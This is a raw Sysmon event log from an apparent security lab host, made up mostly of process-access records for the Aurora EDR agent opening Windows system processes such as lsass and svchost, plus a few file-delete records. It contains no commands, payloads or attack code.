12:31:11.837{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048666Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:11.833{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048665Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:11.827{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048664Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:11.825{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048663Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:11.824{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048662Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:11.822{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048661Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:11.798{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048660Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:11.793{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048659Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:11.789{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048658Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:11.778{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048657Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:11.772{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048656Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:11.766{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048655Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:11.759{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048654Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:11.745{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048653Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:11.743{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048652Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:11.735{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048651Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:11.729{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048650Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:11.697{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048649Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:11.695{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 23542300x800000000000000048648Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:11.303{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\acrocef_low\chrome_BITS_3796_509197770\BIT4AE6.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048647Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:11.260{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=8C9DEE0F0C2FFBCAF2388F2CCAB2114D,SHA256=2A5F8CC037FFB0C780F042B720AA86F932878EE9297EB0C4E9BEDE78339A18F5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048646Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:11.259{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\acrocef_low\chrome_BITS_3796_509197770\BIT4AE6.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000048645Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:11.256{FE4C2B44-D9F5-63C7-1600-00000000AF02}12963348C:\Windows\system32\svchost.exe{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|c:\windows\system32\qmgr.dll+2e4ff|c:\windows\system32\qmgr.dll+2ce27|c:\windows\system32\qmgr.dll+1f3ce|c:\windows\system32\qmgr.dll+1f73c|c:\windows\system32\qmgr.dll+1f575|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+6176d|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+7c319|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+3528e|C:\Windows\System32\RPCRT4.dll+20c07|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b 23542300x800000000000000048644Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:11.211{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED749862D2524052E9774304425E3223,SHA256=B94E0088B96F600CE270840E3F38E0FDD23AF67B46EA670BF0AF6D9FD933F5B4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000048643Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:11.127{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041824C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|c:\windows\system32\es.dll+13e45|c:\windows\system32\es.dll+f73c|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+6176d|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+7c319|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+3528e|C:\Windows\System32\RPCRT4.dll+20c07|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e 10341000x800000000000000048642Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:11.111{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+11a2e|C:\Windows\system32\lsasrv.dll+20b1a|C:\Windows\SYSTEM32\samsrv.dll+6141|C:\Windows\SYSTEM32\samsrv.dll+6042|C:\Windows\SYSTEM32\samsrv.dll+161ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048641Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:11.111{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+11a2e|C:\Windows\system32\lsasrv.dll+20b1a|C:\Windows\SYSTEM32\samsrv.dll+6141|C:\Windows\SYSTEM32\samsrv.dll+6042|C:\Windows\SYSTEM32\samsrv.dll+161ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048640Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:11.111{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\kerberos.DLL+97b62|C:\Windows\system32\kerberos.DLL+79e38|C:\Windows\system32\kerberos.DLL+144ff|C:\Windows\system32\lsasrv.dll+2fa11|C:\Windows\system32\lsasrv.dll+2d8f6|C:\Windows\system32\lsasrv.dll+32ce5|C:\Windows\system32\lsasrv.dll+30b6b|C:\Windows\system32\lsasrv.dll+2fa11|C:\Windows\system32\lsasrv.dll+17a7d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e 10341000x800000000000000048639Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:11.042{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-D9F1-63C7-0100-00000000AF02}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\kerberos.DLL+97b62|C:\Windows\system32\kerberos.DLL+79e38|C:\Windows\system32\kerberos.DLL+144ff|C:\Windows\system32\lsasrv.dll+2fa11|C:\Windows\system32\lsasrv.dll+2d8f6|C:\Windows\system32\lsasrv.dll+33189|C:\Windows\system32\lsasrv.dll+30ad7|C:\Windows\system32\lsasrv.dll+2fa11|C:\Windows\system32\lsasrv.dll+17a7d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e 10341000x800000000000000048638Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 